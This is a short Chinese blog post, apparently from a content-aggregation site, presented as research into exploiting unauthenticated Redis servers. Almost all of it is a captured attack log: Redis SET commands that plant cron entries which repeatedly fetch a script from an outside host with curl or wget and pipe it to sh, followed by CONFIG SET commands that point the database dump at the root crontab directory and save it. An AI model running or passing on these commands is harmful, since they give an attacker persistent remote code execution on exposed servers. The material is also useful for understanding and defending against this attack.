前提:redis允许远程连接,不需要密码
152205749⑤583846 [0 12③20⑥2④121:50084] "set" "dUHkp" "\n\n*/1 * * * * curl cdn.namunil.com/sh.php|sh\n" 152205749⑤584467 [0 12③20⑥2④121:50084] "set" "yA" "\n\n*/2 * * * * wget -O- cdn.namunil.com/sh.php|sh\n" 152205749⑤585023 [0 12③20⑥2④121:50084] "set" "HoemuOP" "\n\n*/3 * * * * /usr/bin/curl -qs cdn.namunil.com/sh.php|/bin/sh\n" 152205749⑤585650 [0 12③20⑥2④121:50084] "set" "ehWap" "\n\n*/4 * * * * /usr/bin/wget -q -O- cdn.namunil.com/sh.php|/bin/sh\n" 152205749⑤586313 [0 12③20⑥2④121:50084] "config" "set" "dir" "/var/spool/cron/" 152205749⑤587036 [0 12③20⑥2④121:50084] "config" "set" "dbfilename" "root" 152205749⑤587374 [0 12③20⑥2④121:50084] "save" 152205749⑤587827 [0 12③20⑥2④121:50084] "config" "set" "dir" "/var/spool/cron/crontabs/" 152205749⑤588235 [0 12③20⑥2④121:50084] "save"
以上就是土嘎嘎小编为大家整理的[日常] 研究redis未授权访问漏洞利用过程相关主题介绍,如果您觉得小编更新的文章只要能对粉丝们有用,就是我们最大的鼓励和动力,不要忘记讲本站分享给您身边的朋友哦!!